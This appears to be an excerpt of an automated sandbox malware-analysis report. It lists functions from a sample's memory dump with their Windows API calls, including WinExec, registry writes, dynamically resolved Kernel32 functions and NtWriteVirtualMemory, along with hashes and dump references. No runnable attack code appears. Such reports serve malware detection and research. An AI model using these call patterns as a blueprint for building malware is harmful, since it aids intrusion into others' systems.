                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                        • Opcode ID: ef31cb22321ea1eda6eff78e1ec1a1967dc24cc3fe08e54687327db1d748cf1b
                                                                                                                        • Instruction ID: 7254343a343f5f3425a20a93182d6f90037fa61ae4c6f7a5391c0937b6ef24a6
                                                                                                                        • Opcode Fuzzy Hash: ef31cb22321ea1eda6eff78e1ec1a1967dc24cc3fe08e54687327db1d748cf1b
                                                                                                                        • Instruction Fuzzy Hash: E6016D35744208BFEB10EEA9DC11B6A77EEF788B00FA18464B908D2641DA74B9019A25
                                                                                                                        Function 029D8410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • WinExec.KERNEL32(?,?), ref: 029D8478
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                        • Opcode ID: eb162f0b1bb31e645dcc3841794e684560b93fbcc5399873a19b62cab402937e
                                                                                                                        • Instruction ID: b88cbfcad86833e499b2cd4561334f33bf7822463e94e4f7970a631e0385e291
                                                                                                                        • Opcode Fuzzy Hash: eb162f0b1bb31e645dcc3841794e684560b93fbcc5399873a19b62cab402937e
                                                                                                                        • Instruction Fuzzy Hash: 4FF06D35744208ABEB10EEA9DC11B5A77EEF788B00FA18464B50892641DA74B9019A25
                                                                                                                        Function 029D5BB4 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029D5CFC,?,?,029D3888,00000001), ref: 029D5C10
                                                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029D5CFC,?,?,029D3888,00000001), ref: 029D5C3E
                                                                                                                          • Part of subcall function 029C7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,029D3888,029D5C7E,00000000,029D5CFC,?,?,029D3888), ref: 029C7D66
                                                                                                                          • Part of subcall function 029C7F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,029D3888,029D5C99,00000000,029D5CFC,?,?,029D3888,00000001), ref: 029C7F3F
                                                                                                                        • GetLastError.KERNEL32(00000000,029D5CFC,?,?,029D3888,00000001), ref: 029D5CA3
                                                                                                                          • Part of subcall function 029CA700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,029CC361,00000000,029CC3BB), ref: 029CA71F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 503785936-0
                                                                                                                        • Opcode ID: e9273241798426510c63e4f1261b8dacb1f878cffc4ebf3b3431de64a6bbf67f
                                                                                                                        • Instruction ID: 60b1632a7115e4ed5382b0a4e476965599482383a6eeccc2c62e818c7e1b479d
                                                                                                                        • Opcode Fuzzy Hash: e9273241798426510c63e4f1261b8dacb1f878cffc4ebf3b3431de64a6bbf67f
                                                                                                                        • Instruction Fuzzy Hash: 92316670A043099FDB00EFA4C9817EEB7F6AF88714FA18469E504E7380DB755905CFA6
                                                                                                                        Function 029DE6BE Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02B15914), ref: 029DE704
                                                                                                                        • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,029DE76F), ref: 029DE73C
                                                                                                                        • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,029DE76F), ref: 029DE747
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 779948276-0
                                                                                                                        • Opcode ID: 1fab643168cb4063880089bfa6a4618db97ee96c6c42a11e4dde9f5534d5ca76
                                                                                                                        • Instruction ID: 67b671f2e514e02c386a66bd6e2879099ebd3556d64f045c9e377dba3615310f
                                                                                                                        • Opcode Fuzzy Hash: 1fab643168cb4063880089bfa6a4618db97ee96c6c42a11e4dde9f5534d5ca76
                                                                                                                        • Instruction Fuzzy Hash: A3114F71750214AFEB14EFA8CC9196E7BEDEB88760FA05468B604DB254D730DE00DF62
                                                                                                                        Function 029DE6C0 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02B15914), ref: 029DE704
                                                                                                                        • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,029DE76F), ref: 029DE73C
                                                                                                                        • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,029DE76F), ref: 029DE747
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 779948276-0
                                                                                                                        • Opcode ID: 1c166cb1b926bdb8e6a6d212426aaf7c9c832e140515a040e57312b731035103
                                                                                                                        • Instruction ID: e00dcf7cb4661d1134512e8ba4f6f5aac58a5f2304e7c768ec746809103ca5ce
                                                                                                                        • Opcode Fuzzy Hash: 1c166cb1b926bdb8e6a6d212426aaf7c9c832e140515a040e57312b731035103
                                                                                                                        • Instruction Fuzzy Hash: F9114F71750214AFEB14EFA8C89195E7BEDEB88760FA05468B604DB254D730DA00DF62
                                                                                                                        Function 029CE2EC Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: 302ade95d1b9a7ba2de9142f3412600a97bc6d975b7accb27b37e500ab4a575b
                                                                                                                        • Instruction ID: 951342a2624dafbf97ecb8509192666265faf94e6d8d84769df7e27860189299
                                                                                                                        • Opcode Fuzzy Hash: 302ade95d1b9a7ba2de9142f3412600a97bc6d975b7accb27b37e500ab4a575b
                                                                                                                        • Instruction Fuzzy Hash: E9F0622470421486D7257B38C9C866D6A9EBFC5710B70583EA4CB9B28ACB34EC46CB63
                                                                                                                        Function 029C4CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(029DE950), ref: 029C4C1A
                                                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 029C4D07
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 029C4D19
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 986138563-0
                                                                                                                        • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                        • Instruction ID: 2ad7de5a631f4bd0fc11fb5ed58ca84d46a0ee583fbe0a968d86b0d881d0ff0b
                                                                                                                        • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                        • Instruction Fuzzy Hash: 7DE017FC2052016EFB182F21DC50B3B772EAFC1741B74989DA804CA169DB38D841AE3A
                                                                                                                        Function 029D7064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 029D7362
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 3341692771-2852464175
                                                                                                                        • Opcode ID: 5fd2bfe7138d82b1d633c9a30c2d0cc91df03f5916d5dbda417ae3618b8e72f4
                                                                                                                        • Instruction ID: 7b1850f3ae1e01b046be3927dce8ffdb4b763f5b409c6a910f171311063a395b
                                                                                                                        • Opcode Fuzzy Hash: 5fd2bfe7138d82b1d633c9a30c2d0cc91df03f5916d5dbda417ae3618b8e72f4
                                                                                                                        • Instruction Fuzzy Hash: 54B1EF74A016089FDB14CFA9E880AADFBF6FF89314F248569E905AB360D731A845DF50
                                                                                                                        Function 029D8824 Relevance: 3.1, APIs: 2, Instructions: 65libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                          • Part of subcall function 029D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        • FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3283153180-0
                                                                                                                        • Opcode ID: d4ca3f887d8fc59d5491ef7d3a2c4fd6934bc728dbf89816b4b46bca9b468efe
                                                                                                                        • Instruction ID: 0d1fe3d3a2362f5c7c69a9ea0d6ca8f1c22128b883a1f0f74becf1fe7d79ef68
                                                                                                                        • Opcode Fuzzy Hash: d4ca3f887d8fc59d5491ef7d3a2c4fd6934bc728dbf89816b4b46bca9b468efe
                                                                                                                        • Instruction Fuzzy Hash: F0119A74B40314ABFB50FBE8CE11A5E77AAEBC5710F6244A87108E7642DE3499019F55
                                                                                                                        Function 029CE6E8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 029CE709
                                                                                                                          • Part of subcall function 029CE2EC: VariantClear.OLEAUT32(?), ref: 029CE2FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCopy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 274517740-0
                                                                                                                        • Opcode ID: f5b4b80eac852f800e1c5e6d9d677302ef082feeffd925b338c4710ae2c093c5
                                                                                                                        • Instruction ID: 8f3a2f868f565467b878d9ae0b3a9593793a2c2acd7ec22007c3339e87004c6a
                                                                                                                        • Opcode Fuzzy Hash: f5b4b80eac852f800e1c5e6d9d677302ef082feeffd925b338c4710ae2c093c5
                                                                                                                        • Instruction Fuzzy Hash: D6117020700254978B30AB28C9C4666679AEFC5750734983EA9CB9B25ADB30CC41CA63
                                                                                                                        Function 029CE384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1927566239-0
                                                                                                                        • Opcode ID: 684a30644f340b77280ccdd81a43919218e410bb1e10336edb0dec065349b242
                                                                                                                        • Instruction ID: 3c83bad917d7469f9a09c172991615aac9778abf55f925a99cc1fa80250b5cae
                                                                                                                        • Opcode Fuzzy Hash: 684a30644f340b77280ccdd81a43919218e410bb1e10336edb0dec065349b242
                                                                                                                        • Instruction Fuzzy Hash: 40315071A00248AFDB10DFA8C985ABE77ECEB4C304F644569F98AD3241D734E951CB63
                                                                                                                        Function 029D6CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,029D6D41,?,?,?,00000000), ref: 029D6D21
                                                                                                                          • Part of subcall function 029C4C0C: SysFreeString.OLEAUT32(029DE950), ref: 029C4C1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4225568880-0
                                                                                                                        • Opcode ID: 696a0d9e4344b970e80d0e546907a1b83b733301ad7319d03e5a2dc8c013e55c
                                                                                                                        • Instruction ID: 9a5b863f8e1eeed594c7d31afaef69e63305e46ef3bd4f05ae83db02d06fbee8
                                                                                                                        • Opcode Fuzzy Hash: 696a0d9e4344b970e80d0e546907a1b83b733301ad7319d03e5a2dc8c013e55c
                                                                                                                        • Instruction Fuzzy Hash: 90E06571704204BBE701FBA1EC5195A77EDEFC9B10B614475E401D3550D974BD00A961
                                                                                                                        Function 029C5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(029C0000,?,00000105), ref: 029C5832
                                                                                                                          • Part of subcall function 029C5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029C0000,029ED790), ref: 029C5A94
                                                                                                                          • Part of subcall function 029C5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029C0000,029ED790), ref: 029C5AB2
                                                                                                                          • Part of subcall function 029C5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029C0000,029ED790), ref: 029C5AD0
                                                                                                                          • Part of subcall function 029C5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029C5AEE
                                                                                                                          • Part of subcall function 029C5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029C5B37
                                                                                                                          • Part of subcall function 029C5A78: RegQueryValueExA.ADVAPI32(?,029C5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029C5B7D,?,80000001), ref: 029C5B55
                                                                                                                          • Part of subcall function 029C5A78: RegCloseKey.ADVAPI32(?,029C5B84,00000000,?,?,00000000,029C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029C5B77
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2796650324-0
                                                                                                                        • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                        • Instruction ID: a9db3406436e010b39dd26fcd0d6c35844e548252361633a938da95657345822
                                                                                                                        • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                        • Instruction Fuzzy Hash: BCE06D71A002148BCB14DE5888C0A4637D8AB08750F510569EC58EF34AD370ED208BE2
